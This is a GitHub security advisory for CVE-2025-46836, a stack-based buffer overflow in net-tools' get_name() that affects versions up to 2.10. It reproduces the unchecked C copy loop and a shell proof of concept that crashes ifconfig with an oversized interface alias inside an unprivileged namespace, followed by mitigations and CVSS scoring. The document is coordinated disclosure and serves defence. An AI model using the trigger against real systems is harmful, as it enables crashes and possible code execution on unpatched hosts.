这是indexloc提供的服务,不要输入任何密码
Skip to content

Stack-based Buffer Overflow in net-tools (get_name)

Moderate
ecki published GHSA-pfwf-h6m3-63wf May 14, 2025

Package

net-tools (linux)

Affected versions

<= 2.10

Patched versions

2.20

Description

Stack-based Buffer Overflow in get_name() (net-tools ≤ 2.10)

Summary

The Linux network utilities (like ifconfig) from the net-tools package do not properly validate the structure of /proc files when showing interfaces. get_name() in interface.c copies interface labels from /proc/net/dev into a fixed 16-byte stack buffer without bounds checking, leading to possible arbitrary code execution or crash.

The known attack path does not require privilege but also does not provide privilege escalation in this scenario.

  • Affected versions – All releases through 2.10
  • Fixed version – planned for net-tools 2.20

Technical details

The structure of the kernel /proc file is trusted during parsing during display of network interfaces. name is declared by the caller as char name[IFNAMSIZ] (16 bytes). An alias longer than 15 bytes causes a classic stack-based overflow.

/* interface.c */
static const char *get_name(char *name, const char *p)
{
    while (isspace(*p))
        p++;
    while (*p) {
        if (*p == ':') {
            const char *dot = p++;
            while (*p && isdigit(*p))           /* copies every digit */
                p++;
            if (*p == ':') {
                p = dot;
                *name++ = *p++;                 /* no length check */
                while (*p && isdigit(*p))
                    *name++ = *p++;             /* overflows name[16] */
            }
            break;
        }
        *name++ = *p++;                         /* also unchecked */
    }
    *name++ = '\0';
    return p;
}

Proof of concept

# Create /tmp/dev_poc with a 1 KiB iface alias
alias="veth0:$(head -c 1024 </dev/zero | tr '\0' 9):"
{
  printf 'Inter-|   Receive                        |  Transmit\n'
  printf ' face |bytes    packets errs drop fifo frame compressed multicast\n'
  printf '%s 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0\n' "$alias"
} > /tmp/dev_poc

# Trigger inside unprivileged namespaces (no sudo required)
unshare -Urim sh -c ' 
  umount /proc                    # works because we’re UID 0 *inside* the ns 
  mount -t tmpfs tmpfs /proc
  mkdir -p /proc/net
  cp /tmp/dev_poc /proc/net/dev # regular tmpfs file
  /home/kali/net-tools/ifconfig -a # change to the binary 
'

Mitigations

  1. Apply the patch or update to a fixed release 2.20 or de-install the obsolete package.
  2. Optional: disable unprivileged user-namespaces (sysctl kernel.unprivileged_userns_clone=0) to remove the easiest non-privileged trigger path.

Credits

Discovered, reported and coordinated by Mohamed Maatallah (@Zephkek), May 2025.

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Local
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H

CVE ID

CVE-2025-46836

Weaknesses

Improper Input Validation

The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. Learn more on MITRE.

Stack-based Buffer Overflow

A stack-based buffer overflow condition is a condition where the buffer being overwritten is allocated on the stack (i.e., is a local variable or, rarely, a parameter to a function). Learn more on MITRE.

Credits